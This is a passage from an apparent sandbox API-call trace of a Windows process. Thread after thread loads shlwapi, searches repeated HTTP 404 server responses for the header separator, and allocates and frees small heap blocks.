charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.500] GetProcessHeap () returned 0x690000 [0264.500] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0264.500] GetProcessHeap () returned 0x690000 [0264.500] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0264.500] GetProcessHeap () returned 0x690000 [0264.501] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 353 os_tid = 0x1564 [0264.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.735] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.735] GetProcessHeap () returned 0x690000 [0264.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0264.735] GetProcessHeap () returned 0x690000 [0264.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0264.735] GetProcessHeap () returned 0x690000 [0264.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 354 os_tid = 0x1568 [0264.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.940] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.940] GetProcessHeap () returned 0x690000 [0264.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0264.940] GetProcessHeap () returned 0x690000 [0264.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0264.940] GetProcessHeap () returned 0x690000 [0264.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 355 os_tid = 0x1570 [0265.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.154] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.155] GetProcessHeap () returned 0x690000 [0265.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0265.155] GetProcessHeap () returned 0x690000 [0265.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0265.155] GetProcessHeap () returned 0x690000 [0265.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 356 os_tid = 0x1574 [0265.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.358] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.358] GetProcessHeap () returned 0x690000 [0265.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0265.358] GetProcessHeap () returned 0x690000 [0265.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0265.358] GetProcessHeap () returned 0x690000 [0265.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 357 os_tid = 0x1578 [0265.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.577] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.577] GetProcessHeap () returned 0x690000 [0265.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0265.577] GetProcessHeap () returned 0x690000 [0265.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0265.577] GetProcessHeap () returned 0x690000 [0265.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 358 os_tid = 0x157c [0266.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.284] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.284] GetProcessHeap () returned 0x690000 [0266.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0266.284] GetProcessHeap () returned 0x690000 [0266.284] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0266.284] GetProcessHeap () returned 0x690000 [0266.285] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 359 os_tid = 0x1580 [0266.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.484] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.484] GetProcessHeap () returned 0x690000 [0266.484] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0266.484] GetProcessHeap () returned 0x690000 [0266.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0266.484] GetProcessHeap () returned 0x690000 [0266.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 360 os_tid = 0x1584 [0266.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.684] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.684] GetProcessHeap () returned 0x690000 [0266.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0266.684] GetProcessHeap () returned 0x690000 [0266.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0266.684] GetProcessHeap () returned 0x690000 [0266.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 361 os_tid = 0x1588 [0266.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.913] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.913] GetProcessHeap () returned 0x690000 [0266.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0266.913] GetProcessHeap () returned 0x690000 [0266.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0266.913] GetProcessHeap () returned 0x690000 [0266.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 362 os_tid = 0x1590 [0267.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.115] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.115] GetProcessHeap () returned 0x690000 [0267.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0267.115] GetProcessHeap () returned 0x690000 [0267.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0267.115] GetProcessHeap () returned 0x690000 [0267.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 363 os_tid = 0x1594 [0267.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.318] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.318] GetProcessHeap () returned 0x690000 [0267.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0267.319] GetProcessHeap () returned 0x690000 [0267.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0267.319] GetProcessHeap () returned 0x690000 [0267.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 364 os_tid = 0x1598 [0267.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.538] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.538] GetProcessHeap () returned 0x690000 [0267.538] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0267.538] GetProcessHeap () returned 0x690000 [0267.538] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0267.538] GetProcessHeap () returned 0x690000 [0267.539] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 365 os_tid = 0x159c [0267.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.734] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.734] GetProcessHeap () returned 0x690000 [0267.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0267.734] GetProcessHeap () returned 0x690000 [0267.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0267.734] GetProcessHeap () returned 0x690000 [0267.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 366 os_tid = 0x15a0 [0268.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.055] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.055] GetProcessHeap () returned 0x690000 [0268.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0268.055] GetProcessHeap () returned 0x690000 [0268.055] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0268.055] GetProcessHeap () returned 0x690000 [0268.056] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 367 os_tid = 0x15a4 [0268.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.299] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.299] GetProcessHeap () returned 0x690000 [0268.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0268.299] GetProcessHeap () returned 0x690000 [0268.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0268.299] GetProcessHeap () returned 0x690000 [0268.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 368 os_tid = 0x15a8 [0268.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.487] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.487] GetProcessHeap () returned 0x690000 [0268.487] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0268.487] GetProcessHeap () returned 0x690000 [0268.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0268.487] GetProcessHeap () returned 0x690000 [0268.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 369 os_tid = 0x15ac [0268.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.636] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.637] GetProcessHeap () returned 0x690000 [0268.637] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0268.637] GetProcessHeap () returned 0x690000 [0268.637] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0268.638] GetProcessHeap () returned 0x690000 [0268.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 370 os_tid = 0x15b0 [0268.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.891] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.891] GetProcessHeap () returned 0x690000 [0268.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0268.891] GetProcessHeap () returned 0x690000 [0268.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0268.891] GetProcessHeap () returned 0x690000 [0268.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 371 os_tid = 0x15b4 [0269.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.129] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.129] GetProcessHeap () returned 0x690000 [0269.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0269.129] GetProcessHeap () returned 0x690000 [0269.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0269.129] GetProcessHeap () returned 0x690000 [0269.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 372 os_tid = 0x15b8 [0269.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.309] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.309] GetProcessHeap () returned 0x690000 [0269.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0269.309] GetProcessHeap () returned 0x690000 [0269.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0269.309] GetProcessHeap () returned 0x690000 [0269.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 373 os_tid = 0x15bc [0269.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.524] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.524] GetProcessHeap () returned 0x690000 [0269.524] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0269.524] GetProcessHeap () returned 0x690000 [0269.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0269.524] GetProcessHeap () returned 0x690000 [0269.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 374 os_tid = 0x15c0 [0269.766] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.766] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.766] GetProcessHeap () returned 0x690000 [0269.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0269.766] GetProcessHeap () returned 0x690000 [0269.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0269.766] GetProcessHeap () returned 0x690000 [0269.767] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 375 os_tid = 0x15c4 [0270.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.001] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.001] GetProcessHeap () returned 0x690000 [0270.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0270.001] GetProcessHeap () returned 0x690000 [0270.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0270.001] GetProcessHeap () returned 0x690000 [0270.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 376 os_tid = 0x15c8 [0270.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.212] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.212] GetProcessHeap () returned 0x690000 [0270.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0270.212] GetProcessHeap () returned 0x690000 [0270.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0270.212] GetProcessHeap () returned 0x690000 [0270.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 377 os_tid = 0x15cc [0270.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.423] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.423] GetProcessHeap () returned 0x690000 [0270.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0270.423] GetProcessHeap () returned 0x690000 [0270.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0270.423] GetProcessHeap () returned 0x690000 [0270.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 378 os_tid = 0x15d0 [0270.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.637] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.637] GetProcessHeap () returned 0x690000 [0270.637] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0270.637] GetProcessHeap () returned 0x690000 [0270.637] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0270.637] GetProcessHeap () returned 0x690000 [0270.637] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 379 os_tid = 0x15d4 [0270.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.886] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.886] GetProcessHeap () returned 0x690000 [0270.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0270.886] GetProcessHeap () returned 0x690000 [0270.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0270.887] GetProcessHeap () returned 0x690000 [0270.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 380 os_tid = 0x15d8 [0271.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.137] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.137] GetProcessHeap () returned 0x690000 [0271.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0271.137] GetProcessHeap () returned 0x690000 [0271.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0271.137] GetProcessHeap () returned 0x690000 [0271.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 381 os_tid = 0x15dc [0271.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.350] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.350] GetProcessHeap () returned 0x690000 [0271.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0271.350] GetProcessHeap () returned 0x690000 [0271.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0271.350] GetProcessHeap () returned 0x690000 [0271.351] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 382 os_tid = 0x15e0 [0271.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.568] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.568] GetProcessHeap () returned 0x690000 [0271.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0271.568] GetProcessHeap () returned 0x690000 [0271.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0271.568] GetProcessHeap () returned 0x690000 [0271.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 383 os_tid = 0x15e4 [0271.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.872] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:17 GMT\r\nServer: Apache\r\nStatus: 404 